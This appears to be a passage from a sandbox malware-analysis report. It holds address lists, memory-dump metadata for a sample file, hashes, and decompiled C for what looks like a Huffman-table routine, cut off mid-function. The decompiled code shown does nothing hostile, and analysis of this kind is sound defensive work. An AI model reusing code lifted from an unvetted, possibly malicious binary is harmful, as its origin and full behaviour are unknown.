                                                  0x00406ab6
                                                  0x00406ab6
                                                  0x00000000
                                                  0x004070b1
                                                  0x004070b1
                                                  0x004070b5
                                                  0x004070b8
                                                  0x004070bb
                                                  0x004070be
                                                  0x00000000
                                                  0x00000000
                                                  0x004070c4
                                                  0x004070c4
                                                  0x004070e9
                                                  0x004070e9
                                                  0x004070e9
                                                  0x004070eb
                                                  0x00000000
                                                  0x00000000
                                                  0x004070c9
                                                  0x004070c9
                                                  0x004070cd
                                                  0x00000000
                                                  0x00000000
                                                  0x004070d3
                                                  0x004070d3
                                                  0x004070d6
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070de
                                                  0x004070e0
                                                  0x004070e3
                                                  0x004070e6
                                                  0x004070e6
                                                  0x004070e6
                                                  0x004070ed
                                                  0x004070ed
                                                  0x004070f5
                                                  0x004070f8
                                                  0x004070fb
                                                  0x004070fe
                                                  0x00407102
                                                  0x00407105
                                                  0x00407107
                                                  0x0040710a
                                                  0x0040710c
                                                  0x00407120
                                                  0x00407120
                                                  0x00407123
                                                  0x0040713d
                                                  0x0040713d
                                                  0x00407140
                                                  0x00000000
                                                  0x00000000
                                                  0x00407146
                                                  0x00407146
                                                  0x00407149
                                                  0x00000000
                                                  0x00000000
                                                  0x0040714f
                                                  0x0040714f
                                                  0x00000000
                                                  0x0040714f
                                                  0x00407125
                                                  0x00407128
                                                  0x0040712f
                                                  0x00407132
                                                  0x00000000
                                                  0x00407132
                                                  0x0040710e
                                                  0x00407112
                                                  0x00407115
                                                  0x00000000
                                                  0x00000000
                                                  0x0040715a
                                                  0x0040715a
                                                  0x0040717f
                                                  0x0040717f
                                                  0x0040717f
                                                  0x00407181
                                                  0x00000000
                                                  0x00000000
                                                  0x0040715f
                                                  0x0040715f
                                                  0x00407163
                                                  0x00000000
                                                  0x00000000
                                                  0x00407169
                                                  0x00407169
                                                  0x0040716c
                                                  0x0040716f
                                                  0x00407172
                                                  0x00407174
                                                  0x00407176
                                                  0x00407179
                                                  0x0040717c
                                                  0x0040717c
                                                  0x0040717c
                                                  0x00407183
                                                  0x0040718b
                                                  0x0040718e
                                                  0x00407191
                                                  0x00407193
                                                  0x00407196
                                                  0x00407196
                                                  0x00407198
                                                  0x0040719c
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a5
                                                  0x00000000
                                                  0x00000000
                                                  0x004071ab
                                                  0x004071ab
                                                  0x004071d0
                                                  0x004071d0
                                                  0x004071d0
                                                  0x004071d2
                                                  0x00000000
                                                  0x00000000
                                                  0x004071b0
                                                  0x004071b0
                                                  0x004071b4
                                                  0x00000000
                                                  0x00000000
                                                  0x004071ba
                                                  0x004071ba
                                                  0x004071bd
                                                  0x004071c0
                                                  0x004071c3
                                                  0x004071c5
                                                  0x004071c7
                                                  0x004071ca
                                                  0x004071cd
                                                  0x004071cd
                                                  0x004071cd
                                                  0x004071d4
                                                  0x004071d4
                                                  0x004071dc
                                                  0x004071df
                                                  0x004071e2
                                                  0x004071e5
                                                  0x004071e9
                                                  0x004071ec
                                                  0x004071ee
                                                  0x004071f1
                                                  0x004071f4
                                                  0x0040720e
                                                  0x0040720e
                                                  0x00407211
                                                  0x00000000
                                                  0x00000000
                                                  0x00407217
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407221
                                                  0x00000000
                                                  0x00407221
                                                  0x004071f6
                                                  0x004071f9
                                                  0x00407200
                                                  0x00407203
                                                  0x00000000
                                                  0x00000000
                                                  0x00407229
                                                  0x00407229
                                                  0x0040724e
                                                  0x0040724e
                                                  0x0040724e
                                                  0x00407250
                                                  0x00000000
                                                  0x00000000
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x00000000
                                                  0x00000000
                                                  0x00407238
                                                  0x00407238
                                                  0x0040723b
                                                  0x0040723e
                                                  0x00407241
                                                  0x00407243
                                                  0x00407245
                                                  0x00407248
                                                  0x0040724b
                                                  0x0040724b
                                                  0x0040724b
                                                  0x00407252
                                                  0x0040725a
                                                  0x0040725d
                                                  0x00407260
                                                  0x00407262
                                                  0x00407265
                                                  0x00407265
                                                  0x00407267
                                                  0x00000000
                                                  0x00000000
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407270
                                                  0x00407275
                                                  0x00407277
                                                  0x0040727d
                                                  0x0040727f
                                                  0x00407294
                                                  0x00407296
                                                  0x00407296
                                                  0x00407281
                                                  0x00407287
                                                  0x00407289
                                                  0x0040728b
                                                  0x0040728b
                                                  0x00407298
                                                  0x0040729c
                                                  0x0040729f
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x004072a8
                                                  0x004072a8
                                                  0x004072aa
                                                  0x00000000
                                                  0x00000000
                                                  0x004072b0
                                                  0x004072b0
                                                  0x004072b6
                                                  0x004072b8
                                                  0x004072dd
                                                  0x004072e0
                                                  0x004072e6
                                                  0x004072eb
                                                  0x004072f1
                                                  0x004072f7
                                                  0x004072f9
                                                  0x004072fc
                                                  0x00407305
                                                  0x0040730b
                                                  0x0040730b
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407302
                                                  0x0040730d
                                                  0x00407313
                                                  0x00407315
                                                  0x00407318
                                                  0x0040731a
                                                  0x00407320
                                                  0x00407322
                                                  0x00407324
                                                  0x00407326
                                                  0x00407328
                                                  0x0040732b
                                                  0x00407334
                                                  0x00407337
                                                  0x00407337
                                                  0x0040732d
                                                  0x0040732d
                                                  0x00407330
                                                  0x00407330
                                                  0x0040732b
                                                  0x00407322
                                                  0x00407339
                                                  0x0040733b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040733b
                                                  0x004072ba
                                                  0x004072ba
                                                  0x004072c0
                                                  0x004072c6
                                                  0x004072c8
                                                  0x00000000
                                                  0x00000000
                                                  0x004072ca
                                                  0x004072ca
                                                  0x004072cc
                                                  0x004072ce
                                                  0x004072d7
                                                  0x004072d7
                                                  0x004072d0
                                                  0x004072d0
                                                  0x004072d3
                                                  0x004072d3
                                                  0x004072d9
                                                  0x004072db
                                                  0x00000000
                                                  0x00000000
                                                  0x00407341
                                                  0x00407341
                                                  0x00407346
                                                  0x00407348
                                                  0x00407349
                                                  0x0040734a
                                                  0x0040734b
                                                  0x00407351
                                                  0x00407354
                                                  0x00407357
                                                  0x0040735a
                                                  0x0040735c
                                                  0x00407362
                                                  0x00407362
                                                  0x00407365
                                                  0x00407365
                                                  0x00407365
                                                  0x00407365
                                                  0x0040736e
                                                  0x00000000
                                                  0x00000000
                                                  0x00407373
                                                  0x00407373
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737b
                                                  0x00407412
                                                  0x00407412
                                                  0x00407415
                                                  0x00407417
                                                  0x00407418
                                                  0x00407419
                                                  0x0040741c
                                                  0x00000000
                                                  0x0040741c
                                                  0x00407381
                                                  0x00407381
                                                  0x00407387
                                                  0x00407389
                                                  0x004073ae
                                                  0x004073b1
                                                  0x004073b7
                                                  0x004073bc
                                                  0x004073c2
                                                  0x004073c8
                                                  0x004073ca
                                                  0x004073cd
                                                  0x004073d6
                                                  0x004073dc
                                                  0x004073dc
                                                  0x004073cf
                                                  0x004073d1
                                                  0x004073d3
                                                  0x004073d3
                                                  0x004073de
                                                  0x004073e4
                                                  0x004073e6
                                                  0x004073e9
                                                  0x004073eb
                                                  0x004073f1
                                                  0x004073f3
                                                  0x004073f5
                                                  0x004073f7
                                                  0x004073f9
                                                  0x004073fc
                                                  0x00407405
                                                  0x00407408
                                                  0x00407408
                                                  0x004073fe
                                                  0x004073fe
                                                  0x00407401
                                                  0x00407401
                                                  0x004073fc
                                                  0x004073f3
                                                  0x0040740a
                                                  0x0040740c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040740c
                                                  0x0040738b
                                                  0x0040738b
                                                  0x00407391
                                                  0x00407397
                                                  0x00407399
                                                  0x00000000
                                                  0x00000000
                                                  0x0040739b
                                                  0x0040739b
                                                  0x0040739d
                                                  0x0040739f
                                                  0x004073a6
                                                  0x004073a6
                                                  0x004073a8
                                                  0x004073a1
                                                  0x004073a1
                                                  0x004073a3
                                                  0x004073a3
                                                  0x004073aa
                                                  0x004073ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407424
                                                  0x00407424
                                                  0x00407427
                                                  0x00407429
                                                  0x0040742c
                                                  0x0040742f
                                                  0x0040742f
                                                  0x0040742f
                                                  0x0040742f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406add
                                                  0x00406ac1
                                                  0x00000000
                                                  0x00406ac7
                                                  0x00406aca
                                                  0x00406ad4
                                                  0x00406ad7
                                                  0x00406ada
                                                  0x00000000
                                                  0x00406ada
                                                  0x00406ac1
                                                  0x00406ae5
                                                  0x00406ae8
                                                  0x00406aec
                                                  0x00406af6
                                                  0x00406b00
                                                  0x00406b03
                                                  0x00406b09
                                                  0x00406c3d
                                                  0x00406c3f
                                                  0x00406c45
                                                  0x00406c48
                                                  0x00406c4b
                                                  0x00000000
                                                  0x00406c4b
                                                  0x00406b0f
                                                  0x00406b0f
                                                  0x00406b10
                                                  0x00406b68
                                                  0x00406b68
                                                  0x00406b6f
                                                  0x00406c15
                                                  0x00406c15
                                                  0x00406c1a
                                                  0x00406c1d
                                                  0x00406c22
                                                  0x00406c25
                                                  0x00406c2a
                                                  0x00406c2d
                                                  0x00406c32
                                                  0x00406c35
                                                  0x00406c35
                                                  0x00000000
                                                  0x00406b75
                                                  0x00406b75
                                                  0x00406b75
                                                  0x00406b75
                                                  0x00406b79
                                                  0x00406b79
                                                  0x00406b9b
                                                  0x00406b9e
                                                  0x00406ba0
                                                  0x00406ba3
                                                  0x00406ba8
                                                  0x00406b7e
                                                  0x00406b7e
                                                  0x00406b83
                                                  0x00406b85
                                                  0x00406b87
                                                  0x00406b8c
                                                  0x00406b92
                                                  0x00406b97
                                                  0x00406b99
                                                  0x00406b99
                                                  0x00406b8e
                                                  0x00406b8e
                                                  0x00406b8e
                                                  0x00406b8c
                                                  0x00000000
                                                  0x00406baa
                                                  0x00406bd7
                                                  0x00406bdc
                                                  0x00406bde
                                                  0x00406bdf
                                                  0x00406be1
                                                  0x00406be2
                                                  0x00406be2
                                                  0x00406be2
                                                  0x00406c0a
                                                  0x00406c0f
                                                  0x00406c0f
                                                  0x00000000
                                                  0x00406c0f
                                                  0x00406ba8
                                                  0x00406b6f
                                                  0x00406b12
                                                  0x00406b12
                                                  0x00406b13
                                                  0x00406b5d
                                                  0x00000000
                                                  0x00406b5d
                                                  0x00406b15
                                                  0x00406b16
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c72
                                                  0x00406c72
                                                  0x00406c72
                                                  0x00406c75
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c52
                                                  0x00406c52
                                                  0x00406c56
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c5c
                                                  0x00406c5c
                                                  0x00406c5f
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c69
                                                  0x00406c6c
                                                  0x00406c6f
                                                  0x00406c6f
                                                  0x00406c6f
                                                  0x00406c77
                                                  0x00406c77
                                                  0x00406c7a
                                                  0x00406c7c
                                                  0x00406c81
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c89
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c8f
                                                  0x00406c8f
                                                  0x00406c91
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c97
                                                  0x00406c97
                                                  0x00406c9b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ca1
                                                  0x00406ca1
                                                  0x00406ca4
                                                  0x00406ca6
                                                  0x00406d44
                                                  0x00406d44
                                                  0x00406d47
                                                  0x00406d49
                                                  0x00406d49
                                                  0x00406d4c
                                                  0x00406d4f
                                                  0x00406d51
                                                  0x00406d53
                                                  0x00406d55
                                                  0x00406d55
                                                  0x00406d5e
                                                  0x00406d63
                                                  0x00406d66
                                                  0x00406d69
                                                  0x00406d6c
                                                  0x00406d6f
                                                  0x00406d6f
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d78
                                                  0x00406d78
                                                  0x00406d7e
                                                  0x00406d7e
                                                  0x00406d7e
                                                  0x00000000
                                                  0x00406d72
                                                  0x00406cac
                                                  0x00406cac
                                                  0x00406cb2
                                                  0x00406cb5
                                                  0x00406cb7
                                                  0x00406ce2
                                                  0x00406ce5
                                                  0x00406ceb
                                                  0x00406cf0
                                                  0x00406cf6
                                                  0x00406cfc
                                                  0x00406cfe
                                                  0x00406d01
                                                  0x00406d0a
                                                  0x00406d10
                                                  0x00406d10
                                                  0x00406d03
                                                  0x00406d05
                                                  0x00406d07
                                                  0x00406d07
                                                  0x00406d12
                                                  0x00406d18
                                                  0x00406d1b
                                                  0x00406d1d
                                                  0x00406d1f
                                                  0x00406d25
                                                  0x00406d27
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d35
                                                  0x00406d35
                                                  0x00406d37
                                                  0x00406d2e
                                                  0x00406d2e
                                                  0x00406d31
                                                  0x00406d31
                                                  0x00406d39
                                                  0x00406d39
                                                  0x00406d27
                                                  0x00406d3c
                                                  0x00406d3e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d3e
                                                  0x00406cb9
                                                  0x00406cb9
                                                  0x00406cbf
                                                  0x00406cc5
                                                  0x00406cc7
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cc9
                                                  0x00406cc9
                                                  0x00406ccb
                                                  0x00406ccd
                                                  0x00406cd0
                                                  0x00406cd7
                                                  0x00406cd7
                                                  0x00406cd9
                                                  0x00406cd2
                                                  0x00406cd2
                                                  0x00406cd4
                                                  0x00406cd4
                                                  0x00406cdb
                                                  0x00406cdd
                                                  0x00406ce0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406de4
                                                  0x00406de7
                                                  0x00406dea
                                                  0x00406df0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406fc7
                                                  0x00406fc7
                                                  0x00406fc7
                                                  0x00406fca
                                                  0x00406fcd
                                                  0x00406fcf
                                                  0x00406fd2
                                                  0x00406fd8
                                                  0x00406fdf
                                                  0x00406fe1
                                                  0x00000000
                                                  0x00000000
                                                  0x00406eb5
                                                  0x00406eb5
                                                  0x00406edd
                                                  0x00406edd
                                                  0x00406edd
                                                  0x00406edf
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ebd
                                                  0x00406ebd
                                                  0x00406ec1
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ec7
                                                  0x00406ec7
                                                  0x00406eca
                                                  0x00406ecd
                                                  0x00406ed0
                                                  0x00406ed2
                                                  0x00406ed4
                                                  0x00406ed7
                                                  0x00406eda
                                                  0x00406eda
                                                  0x00406eda
                                                  0x00406ee1
                                                  0x00406ee1
                                                  0x00406ee9
                                                  0x00406eec
                                                  0x00406ef2
                                                  0x00406ef5
                                                  0x00406ef9
                                                  0x00406efd
                                                  0x00406f00
                                                  0x00406f03
                                                  0x00406f1b
                                                  0x00406f1b
                                                  0x00406f1e
                                                  0x00406f2c
                                                  0x00406f2f
                                                  0x00406f20
                                                  0x00406f20
                                                  0x00406f22
                                                  0x00406f29
                                                  0x00406f29
                                                  0x00406f58
                                                  0x00406f58
                                                  0x00406f58
                                                  0x00406f5b
                                                  0x00406f5d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f38
                                                  0x00406f38
                                                  0x00406f3c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f42
                                                  0x00406f42
                                                  0x00406f45
                                                  0x00406f48
                                                  0x00406f4b
                                                  0x00406f4d
                                                  0x00406f4f
                                                  0x00406f52
                                                  0x00406f55
                                                  0x00406f55
                                                  0x00406f55
                                                  0x00406f5f
                                                  0x00406f5f
                                                  0x00406f61
                                                  0x00406f63
                                                  0x00406f6e
                                                  0x00406f71
                                                  0x00406f74
                                                  0x00406f76
                                                  0x00406f78
                                                  0x00406f7a
                                                  0x00406f7d
                                                  0x00406f80
                                                  0x00406f85
                                                  0x00406f88
                                                  0x00406f8b
                                                  0x00406f8e
                                                  0x00406f95
                                                  0x00406f98
                                                  0x00406f9a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406fa0
                                                  0x00406fa0
                                                  0x00406fa4
                                                  0x00406fb5
                                                  0x00406fb5
                                                  0x00406fb5
                                                  0x00406fb7
                                                  0x00406fb7
                                                  0x00406fbb
                                                  0x00406fbb
                                                  0x00406fbb
                                                  0x00406fbd
                                                  0x00406fbe
                                                  0x00406fc1
                                                  0x00406fc1
                                                  0x00406fc1
                                                  0x00406fc4
                                                  0x00000000
                                                  0x00406fc4
                                                  0x00406fa6
                                                  0x00406fa6
                                                  0x00406fa9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406faf
                                                  0x00406faf
                                                  0x00000000
                                                  0x00406faf
                                                  0x00406f05
                                                  0x00406f05
                                                  0x00406f07
                                                  0x00406f09
                                                  0x00406f0c
                                                  0x00406f0f
                                                  0x00406f13
                                                  0x00406f13
                                                  0x00406fe7
                                                  0x00406fe7
                                                  0x00406fea
                                                  0x00406ff1
                                                  0x00406ff5
                                                  0x00406ff7
                                                  0x00406ffa
                                                  0x00406ffd
                                                  0x00407002
                                                  0x00407005
                                                  0x00407007
                                                  0x00407008
                                                  0x0040700b
                                                  0x00407016
                                                  0x00407019
                                                  0x00407030
                                                  0x00407035
                                                  0x0040703c
                                                  0x00407041
                                                  0x00407045
                                                  0x00407047
                                                  0x00407047
                                                  0x00407047
                                                  0x0040704a
                                                  0x0040704c
                                                  0x00000000
                                                  0x00407052
                                                  0x00407052
                                                  0x00407056
                                                  0x00407061
                                                  0x00407074
                                                  0x00407079
                                                  0x0040707e
                                                  0x00407080
                                                  0x00000000
                                                  0x00000000
                                                  0x00407086
                                                  0x00407086
                                                  0x00407089
                                                  0x0040708b
                                                  0x00407099
                                                  0x00407099
                                                  0x0040709c
                                                  0x0040709c
                                                  0x0040709f
                                                  0x004070a2
                                                  0x004070a5
                                                  0x004070a8
                                                  0x004070ab
                                                  0x004070ae
                                                  0x00000000
                                                  0x004070ae
                                                  0x0040708d
                                                  0x0040708d
                                                  0x00407093
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407093
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407432
                                                  0x00407432
                                                  0x00407438
                                                  0x0040743e
                                                  0x00407443
                                                  0x00407449
                                                  0x0040744f
                                                  0x00407451
                                                  0x00407454
                                                  0x0040745d
                                                  0x00407463
                                                  0x00407463
                                                  0x00407456
                                                  0x00407458
                                                  0x0040745a
                                                  0x0040745a
                                                  0x00407465
                                                  0x00407467
                                                  0x0040746a
                                                  0x004074a5
                                                  0x004074a5
                                                  0x00000000
                                                  0x0040746c
                                                  0x0040746c
                                                  0x0040746c
                                                  0x00407472
                                                  0x00407475
                                                  0x00407477
                                                  0x004074ac
                                                  0x004074ae
                                                  0x00000000
                                                  0x004074ae
                                                  0x00000000
                                                  0x00407477
                                                  0x00000000
                                                  0x00406ab6
                                                  0x00407484
                                                  0x00000000
                                                  0x00407484
                                                  0x00406e98
                                                  0x00406e9a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e9c
                                                  0x00406e9c
                                                  0x00406e9f
                                                  0x00000000
                                                  0x00406e9f
                                                  0x00406de4
                                                  0x00406da5
                                                  0x00407489
                                                  0x0040748c
                                                  0x0040748e
                                                  0x00407497
                                                  0x0040749d
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                  • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                  • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                  • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                  				signed int _v8;
                                                  				unsigned int _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				intOrPtr* _v32;
                                                  				signed int* _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				void _v116;
                                                  				signed int _v176;
                                                  				signed int _v180;
                                                  				signed int _v240;
                                                  				signed int _t166;
                                                  				signed int _t168;
                                                  				intOrPtr _t175;
                                                  				signed int _t181;
                                                  				void* _t182;
                                                  				intOrPtr _t183;
                                                  				signed int* _t184;
                                                  				signed int _t186;
                                                  				signed int _t187;
                                                  				signed int* _t189;
                                                  				signed int _t190;
                                                  				intOrPtr* _t191;
                                                  				intOrPtr _t192;
                                                  				signed int _t193;
                                                  				signed int _t195;
                                                  				signed int _t200;
                                                  				signed int _t205;
                                                  				void* _t207;
                                                  				short _t208;
                                                  				signed char _t222;
                                                  				signed int _t224;
                                                  				signed int _t225;
                                                  				signed int* _t232;
                                                  				signed int _t233;
                                                  				signed int _t234;
                                                  				void* _t235;
                                                  				signed int _t236;
                                                  				signed int _t244;
                                                  				signed int _t246;
                                                  				signed int _t251;
                                                  				signed int _t254;
                                                  				signed int _t256;
                                                  				signed int _t259;
                                                  				signed int _t262;
                                                  				void* _t263;
                                                  				void* _t264;
                                                  				signed int _t267;
                                                  				intOrPtr _t269;
                                                  				intOrPtr _t271;
                                                  				signed int _t274;
                                                  				intOrPtr* _t275;
                                                  				unsigned int _t276;
                                                  				void* _t277;
                                                  				signed int _t278;
                                                  				intOrPtr* _t279;
                                                  				signed int _t281;
                                                  				intOrPtr _t282;
                                                  				intOrPtr _t283;
                                                  				signed int* _t284;
                                                  				signed int _t286;
                                                  				signed int _t287;
                                                  				signed int _t288;
                                                  				signed int _t296;
                                                  				signed int* _t297;
                                                  				intOrPtr _t298;
                                                  				void* _t299;
                                                  
                                                  				_t278 = _a8;
                                                  				_t187 = 0x10;
                                                  				memset( &_v116, 0, _t187 << 2);
                                                  				_t189 = _a4;
                                                  				_t233 = _t278;
                                                  				do {
                                                  					_t166 =  *_t189;
                                                  					_t189 =  &(_t189[1]);
                                                  					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                  					_t233 = _t233 - 1;
                                                  				} while (_t233 != 0);
                                                  				if(_v116 != _t278) {
                                                  					_t279 = _a28;
                                                  					_t267 =  *_t279;
                                                  					_t190 = 1;
                                                  					_a28 = _t267;
                                                  					_t234 = 0xf;
                                                  					while(1) {
                                                  						_t168 = 0;
                                                  						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                  							break;
                                                  						}
                                                  						_t190 = _t190 + 1;
                                                  						if(_t190 <= _t234) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_v8 = _t190;
                                                  					if(_t267 < _t190) {
                                                  						_a28 = _t190;
                                                  					}
                                                  					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                  						_t234 = _t234 - 1;
                                                  						if(_t234 != 0) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_v28 = _t234;
                                                  					if(_a28 > _t234) {
                                                  						_a28 = _t234;
                                                  					}
                                                  					 *_t279 = _a28;
                                                  					_t181 = 1 << _t190;
                                                  					while(_t190 < _t234) {
                                                  						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                  						if(_t182 < 0) {
                                                  							L64:
                                                  							return _t168 | 0xffffffff;
                                                  						}
                                                  						_t190 = _t190 + 1;
                                                  						_t181 = _t182 + _t182;
                                                  					}
                                                  					_t281 = _t234 << 2;
                                                  					_t191 = _t299 + _t281 - 0x70;
                                                  					_t269 =  *_t191;
                                                  					_t183 = _t181 - _t269;
                                                  					_v52 = _t183;
                                                  					if(_t183 < 0) {
                                                  						goto L64;
                                                  					}
                                                  					_v176 = _t168;
                                                  					 *_t191 = _t269 + _t183;
                                                  					_t192 = 0;
                                                  					_t235 = _t234 - 1;
                                                  					if(_t235 == 0) {
                                                  						L21:
                                                  						_t184 = _a4;
                                                  						_t271 = 0;
                                                  						do {
                                                  							_t193 =  *_t184;
                                                  							_t184 =  &(_t184[1]);
                                                  							if(_t193 != _t168) {
                                                  								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                  								_t236 =  *_t232;
                                                  								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                  								 *_t232 = _t236 + 1;
                                                  							}
                                                  							_t271 = _t271 + 1;
                                                  						} while (_t271 < _a8);
                                                  						_v16 = _v16 | 0xffffffff;
                                                  						_v40 = _v40 & 0x00000000;
                                                  						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                  						_t195 = _v8;
                                                  						_t186 =  ~_a28;
                                                  						_v12 = _t168;
                                                  						_v180 = _t168;
                                                  						_v36 = 0x432190;
                                                  						_v240 = _t168;
                                                  						if(_t195 > _v28) {
                                                  							L62:
                                                  							_t168 = 0;
                                                  							if(_v52 == 0 || _v28 == 1) {
                                                  								return _t168;
                                                  							} else {
                                                  								goto L64;
                                                  							}
                                                  						}
                                                  						_v44 = _t195 - 1;
                                                  						_v32 = _t299 + _t195 * 4 - 0x70;
                                                  						do {
                                                  							_t282 =  *_v32;
                                                  							if(_t282 == 0) {
                                                  								goto L61;
                                                  							}
                                                  							while(1) {
                                                  								_t283 = _t282 - 1;
                                                  								_t200 = _a28 + _t186;
                                                  								_v48 = _t283;
                                                  								_v24 = _t200;
                                                  								if(_v8 <= _t200) {
                                                  									goto L45;
                                                  								}
                                                  								L31:
                                                  								_v20 = _t283 + 1;
                                                  								do {
                                                  									_v16 = _v16 + 1;
                                                  									_t296 = _v28 - _v24;
                                                  									if(_t296 > _a28) {
                                                  										_t296 = _a28;
                                                  									}
                                                  									_t222 = _v8 - _v24;
                                                  									_t254 = 1 << _t222;
                                                  									if(1 <= _v20) {
                                                  										L40:
                                                  										_t256 =  *_a36;
                                                  										_t168 = 1 << _t222;
                                                  										_v40 = 1;
                                                  										_t274 = _t256 + 1;
                                                  										if(_t274 > 0x5a0) {
                                                  											goto L64;
                                                  										}
                                                  									} else {
                                                  										_t275 = _v32;
                                                  										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                  										if(_t222 >= _t296) {
                                                  											goto L40;
                                                  										}
                                                  										while(1) {
                                                  											_t222 = _t222 + 1;
                                                  											if(_t222 >= _t296) {
                                                  												goto L40;
                                                  											}
                                                  											_t275 = _t275 + 4;
                                                  											_t264 = _t263 + _t263;
                                                  											_t175 =  *_t275;
                                                  											if(_t264 <= _t175) {
                                                  												goto L40;
                                                  											}
                                                  											_t263 = _t264 - _t175;
                                                  										}
                                                  										goto L40;
                                                  									}
                                                  									_t168 = _a32 + _t256 * 4;
                                                  									_t297 = _t299 + _v16 * 4 - 0xec;
                                                  									 *_a36 = _t274;
                                                  									_t259 = _v16;
                                                  									 *_t297 = _t168;
                                                  									if(_t259 == 0) {
                                                  										 *_a24 = _t168;
                                                  									} else {
                                                  										_t276 = _v12;
                                                  										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                  										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                  										_a5 = _a28;
                                                  										_a4 = _t222;
                                                  										_t262 = _t276 >> _t186;
                                                  										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                  										 *(_t298 + _t262 * 4) = _a4;
                                                  									}
                                                  									_t224 = _v24;
                                                  									_t186 = _t224;
                                                  									_t225 = _t224 + _a28;
                                                  									_v24 = _t225;
                                                  								} while (_v8 > _t225);
                                                  								L45:
                                                  								_t284 = _v36;
                                                  								_a5 = _v8 - _t186;
                                                  								if(_t284 < 0x432190 + _a8 * 4) {
                                                  									_t205 =  *_t284;
                                                  									if(_t205 >= _a12) {
                                                  										_t207 = _t205 - _a12 + _t205 - _a12;
